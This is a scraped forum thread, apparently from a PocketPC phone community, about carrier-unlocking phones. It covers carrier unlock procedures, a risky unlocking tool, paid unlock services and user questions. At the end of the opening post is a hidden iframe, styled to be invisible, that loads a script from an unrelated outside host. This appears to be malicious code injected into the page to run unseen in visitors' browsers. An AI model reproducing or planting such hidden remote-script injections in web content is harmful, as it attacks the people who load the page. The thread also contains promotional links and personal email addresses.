+ Reply to Thread
Page 1 of 2 1 2 LastLast
    Editor and Site Administrator Convergent's Avatar

What does it mean to unlock my phone, and how do I do it?

Most cellphone carriers <b><i>lock</i></b> the phones so that they can only be used by there own customers. For example, if you tried to use a T-Mobile phone with a Cingular service plan, it wouldn't likely work. An <b><i>unlocked</i></b> phone is simply one that the carrier has not locked. Since most cell phones are sold through the carriers, at a subsidized price, they need to have some assurance that you will not leave without completing your contract and go to another carrier. It's debatable if locking is a good way to counter that, but nevertheless, thats the way it is.

To unlock a phone, is to simply enter the correct codes so that it will work with any carrier. It is possible to both buy unlocked phones, as well as unlock existing codes. Buying an unlocked phone would typically mean buying it from someone other than a carrier. This is going to be very expensive since there is no subsidy to offload the price, and it is somewhat risky. The PocketPC Phone is not an inexpensive device, and the only reasonable path to the manufacturer, is the carrier.

The other option is to unlock your existing phone.

Unlocking AT&amp;T
    AT&amp;T does not provide a means of unlocking their phones.

Unlocking T-Mobile
    To get your phone unlocked, you need to send an email to <a href="mailto:SIMUnlock@tmobile.com">T-Mobile Unlock Department</a> requesting an unlock code. There are a couple of things to consider before requesting an unlock code. First, they do NOT have to give you this code. Second, they are probably not going to do it if you just bought the phone and don't have a ligitimate reason for it. If, however, you have been on a plan for a while, are a good customer, and have a need (ex. planning a trip to Europe and would like to use a European SIM, rather than roaming there) for the unlock, then you will likely receive the code. Theoretically an unlocked phone should be worth more to sell, than a locked phone. But, my unscientific analysis on eBay shows that the sell price on used PocketPC Phones is the same, unlocked or locked. So, it is probably not worth getting the code if you don't really need it.

Unlocking O2 (UK)
    For a UK O2 xda you can call customer support on 0870 5860860 and ask for data services. Request what they call an "unlatching code". You need to fax them proof of purchase and give them your IMEI.

Unlocking 02 (Hong Kong)
    It appears that XDAs in Hong Kong come unlocked already.

For the Brave
    If you are brave (read.... TRY AT YOUR OWN RISK), this XDA Developers thread describes a possible way to defeat the locking through exploitation of a bug. Update - CHECK THIS OUT... you still need to be brave for this one because you can ruin your phone, but here's an XDA Developer discovered XDA Manipulator program that tells you the unlock code on your XDA.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

wth
    Newly Converged
    Ive managed to unlock my UK o2 XDA by calling o2 and requesting the unlatching code. Make sure you speak to someone in data services as all the other customer service people are useless....

Updated...

Updated to add the "for the brave" link.
    Mike - Been Converged?

Another great find from XDA Developers

Yet another great find from XDA Developers.... check out the XDA Manipulator... but be careful!
    Mike - Been Converged?

Newly Converged

Att SX56 Unlocking...

Can I use the xda manipulator to unlock my SX56 siemens phone...?

At your risk!

Yes, you should be able to use the XDA Manipulator to unlock ANY HTC made Phone Edition (current generation), but do so at your own risk.
    Mike - Been Converged?

Newly Converged

Can I unlock XDA at

Originally posted by "wth"

Ive managed to unlock my UK o2 XDA by calling o2 and requesting the unlatching code. Make sure you speak to someone in data services as all the other customer service people are useless....
    I get a UK product XDA in Hong Kong, I would like to call customer support for unlock code. However, what is IMEI??

IMIE

IMIE (International Mobile Equipment Identity) is a unique code that identifies your device to the network. It can be found on the back of the xda, under the barcode.

Although there is software to do it, I would advise everyone to NOT change the IMEI - this code can be used to identify and bar stolen devices. If us good-minded people start messing with that, it will become harder for the network suppliers to stop people using stolen phones. Don't use a stolen phone - it might be cheap but it has been stolen from someone like you. I'll get off my soapbox now.

rgds,
    Alex.
    pdaPhoneHome.com

Newly Converged

o2 unlocking XDA

o2 Customer Services can organise an unlatch code. Just call the number already posted and ask. If you ask for data services, they just ask what for anyway!

The bad part is that it costs £15.00 and you have to wait a couple of weeks.

Less risky though!

Unlock then what??

Hi - so after I unlock my phone, how can I get it attached to another provider? I'd like to switch my provider from T-Mobile to Cingular, and if I can get an unlock code then how do I go about switching it?

Thanks

Converged

Switching to Cingular

Once you unlock your Tmobile phone, all you need to do to get it to work with Cingular is to insert your sim from your Cingular phone. Also, if you want to use Wireless Internet you have to sign up for that service and enter the appropriate programming codes. This can be a bit of a pain, but I was eventually able to get mine to work. (write me if you need some help with this DaveKgold@aol.com).

My recommendation is, however, that if you have a choice leave it on Tmobile service. It is probably easier and from what I understand has the exact same coverage as they share equipment (towers, cells, etc) with Cingular. Plus if your PPC breaks, you will have a hard time getting it fixed, as I recently have experienced.

Yours,

DKG

DKG

Newly Converged

unlock

hi i unlocked my phone with the xda manupulator...its worth a try..its very very simple..took me two minutes..There is an option for SIDLOCK with the lock no..just press reset there and its all done..very easy..for att sx56..

Newly Converged

Lightbulb

This site is cool , i had one i got it from them,
    http://www.gsmlocker.com/siemensSX56.asp

Converged

Unlock

How can I check a new mpx 200 ATT to see if it is locked (I assume it is)....?

Newly Converged

HELP!!!! Samsung I-330

I have two samsung I-330s that I use on my sprint pcs accounts and I want to unlock the phones so I can switch to another carrier or maybe use it when on a trip outside the US. I don't have any contracts with sprint but have been reluctant to switch because of the amounts I paid for each phone ($499 each) Is it possible to unloc these phones and what sites or how can I unlock them?

Newly Converged

Arrow

Originally posted by rebel
    This site is cool , i had one i got it from them,
    http://www.gsmlocker.com/siemensSX56.asp

Hello, can you let us know more details about way of unlocking. Because on the link which you point, they ask for delivery address, then they send such kind of equipment + software and for all of that they ask 99 USD. I think is too expsnive and dangeros when there is more simple and cheaper way - only by IMEI?

Best Regards,
    Westerna
    http://key.westerna.org

Newly Converged
    hi i have an 02 sony ericson T230 phone. Im moving to australia soon and ive just learned of the prices of tariffs ill have ta pay if i keep this sim card in my phone ant am OUTRAAGGEEDDD!!! now im hearing it has to be 'UNLATCHED' so i can put a different sim card in it!?!? but 02 are tellin me i gotta have the phone for 12 months before they can unlatch it!!! so basically this phone ive just bought is USLESS!?!? itd cost me a FORTUNE to keep this sim card ...so what should i do? plz reply to me, im leaving soon and i dont really wanna fork out for ANOTHER phone when i arrive in sunny sydney...thanx for reading

dave

throwaglass@hotmail.com

Newly Converged
    Originally posted by Westerna
    Hello, can you let us know more details about way of unlocking. Because on the link which you point, they ask for delivery address, then they send such kind of equipment + software and for all of that they ask 99 USD. I think is too expsnive and dangeros when there is more simple and cheaper way - only by IMEI?

Best Regards,
    Westerna
    http://key.westerna.org
    If you are stupied enough you can buy free software at 99 USD.

Definetly he is a big thief who stole other people's work

He is not only an theif ,also his price seems astromics.
    most time he sells free software between 50 to 150 USD...

so what do you expect from this foolish guy who only knows to steal other people's work...

Newly Converged

Lightbulb unlocking xda phones

Hello.

I got my phone unlocked cheaply at http://unlocking.specialratenumbers.com

Cost less than a couple of glass's of wine and did it in under 30 secs.
    genius!

Newly Converged

Talking Get your t-mobile phone unlocked for $25.00! No sending your phone through mail.

I found a place in Frisco Texas that will unlock your phone for either $25 or $30! It's in the Frisco mall, it's called "Skylight Wireless"!!! They didn't ask any questions, just took my phone hooked it up to a computer and in less than 2 minutes my t-mobile phone was working with my cingular/at&t SIM card. It's awesome! If you know of a skylight wireless in your area give them a call and ask them if they doing unlocking or if a store near by will do it! It's alot safer than sending your phone through the mail or giving your credit card number through the internet. It was so simple, I couldn't believe it, now all I need is mods and hacks for my motorola v300 to make it even better, so if anyone knows of any hacks for this phone please let me know, my e-mail is McKinney2237@hotmail.com
    Thanks,
    Lauren